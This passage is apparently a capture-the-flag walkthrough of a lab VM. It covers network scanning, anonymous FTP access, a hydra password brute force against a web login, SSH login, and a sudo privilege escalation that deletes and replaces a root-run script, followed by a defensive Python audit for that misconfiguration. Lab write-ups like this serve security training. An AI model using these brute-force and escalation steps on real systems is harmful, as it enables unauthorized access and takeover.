3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.844 seconds (138.83 hosts/sec). 3 responded

┌──(root㉿kali)-[/home/kali]
└─# nmap 192.168.56.114
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-05 03:30 EDT
Nmap scan report for 192.168.56.114
Host is up (0.00036s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:65:8D:C9 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds
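Start with an nmap scan.
There is an FTP service, so try logging in with the anonymous account to see what is there.
Here, nmap -sV 192.168.56.114 can also detect that port 21 allows anonymous access.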
FTP login
┌──(root㉿kali)-[/home/kali]
└─# ftp 192.168.56.114
Connected to 192.168.56.114.
220 (vsFTPd 3.0.3)
Name (192.168.56.114:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||25004|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 116 4096 Jan 28 2023 .
drwxr-xr-x 2 0 116 4096 Jan 28 2023 ..
-rw-r--r-- 1 1000 1000 5154 Jan 28 2023 output
226 Directory send OK.
┌──(kali㉿kali)-[~]
└─$ hydra -l matthew -P matth.list 192.168.56.114 http-post-form '/login.php:username=matthew&password=^PASS^:<input type="submit" value="Login">'
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-05 05:42:26
[DATA] max 16 tasks per 1 server, overall 16 tasks, 10000 login tries (l:1/p:10000), ~625 tries per task
[DATA] attacking http-post-form://192.168.56.114:80/login.php:username=matthew&password=^PASS^:<input type="submit" value="Login">
[80][http-post-form] host: 192.168.56.114 login: matthew password: matthew2023@1554
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-09-05 05:42:47

## In practice hydra seems more convenient; the graphical Burp is a bit laggy.
┌──(kali㉿kali)-[~]
└─$ ssh matthew@192.168.56.114
The authenticity of host '192.168.56.114 (192.168.56.114)' can't be established.
ED25519 key fingerprint is SHA256:S2tp/jV32/GtUP68f14Rac4/yZXhbMmyut+ZqO+ZOl4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.114' (ED25519) to the list of known hosts.
matthew@192.168.56.114's password:
Linux uvalde.hmv 5.10.0-20-amd64 #1 SMP Debian 5.10.158-2 (2022-12-13) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
matthew@uvalde:~$ ls
user.txt
matthew@uvalde:~$ cat user.txt
6e4136fbed8f8c691996dbf42697d460
matthew@uvalde:/opt$ sudo -l
Matching Defaults entries for matthew on uvalde:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User matthew may run the following commands on uvalde:
    (ALL : ALL) NOPASSWD: /bin/bash /opt/superhack
## can run bash and superhack
matthew@uvalde:~$ rm -rf /opt/superhack
matthew@uvalde:/opt$ echo -n "bash"> superhack
matthew@uvalde:/opt$ sudo /bin/bash /opt/superhack
root@uvalde:/opt# cd ~
root@uvalde:~# ls
root.txt
root@uvalde:~# cat root.txt
59ec54537e98a53691f33e81500f56da
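
Added example (not part of the original writeup): a defender-side audit for the misconfiguration shown above, where a NOPASSWD sudo rule runs a script that the unprivileged user was able to delete and recreate. It parses `sudo -l` rule lines and reports every target file or ancestor directory the given user can write; the function names and the `stop` parameter are assumptions of this example, and the rule line is constructed from the page's output.

```python
import os, re, stat

# Constructed input: the rule line as printed by `sudo -l` on the page.
SUDO_L = "    (ALL : ALL) NOPASSWD: /bin/bash /opt/superhack"

def sudo_paths(sudo_l_output):
    """Absolute paths (commands and their arguments) named in `sudo -l` rule lines."""
    paths = []
    for line in sudo_l_output.splitlines():
        m = re.match(r"\s*\(.*?\)\s*(?:[A-Z]+:\s*)*(.+)", line)
        if m:
            for cmd in m.group(1).split(","):
                paths += [tok for tok in cmd.split() if tok.startswith("/")]
    return paths

def can_write(st, uid, gids):
    """Write permission for uid/gids from the mode bits (owner, then group, then other)."""
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)

def replaceable_by(path, uid, gids, stop="/"):
    """Reasons why uid could edit or swap out path, checking ancestors up to stop."""
    path, stop = os.path.realpath(path), os.path.realpath(stop)
    reasons = []
    if os.path.exists(path) and can_write(os.stat(path), uid, gids):
        reasons.append(f"{path} is writable")
    while path not in (stop, "/"):
        parent = os.path.dirname(path)
        if os.path.isdir(parent):
            pst = os.stat(parent)
            # In a sticky directory only the owner of the entry or of the directory
            # may remove an existing entry; a missing entry can simply be created.
            owns = (pst.st_uid == uid or not os.path.lexists(path)
                    or os.lstat(path).st_uid == uid)
            if can_write(pst, uid, gids) and (owns or not pst.st_mode & stat.S_ISVTX):
                reasons.append(f"{parent} is writable, so {os.path.basename(path)} can be replaced")
        path = parent
    return reasons

if __name__ == "__main__":
    # Audits the invoking (non-root) user against the rule above.
    for p in sudo_paths(SUDO_L):
        for reason in replaceable_by(p, os.getuid(), set(os.getgroups())):
            print(f"sudo target {p}: {reason}")
```

Any reported reason means the rule is equivalent to unrestricted root for that user; the fix is a root-owned script in a root-owned, non-writable directory, or removing the rule.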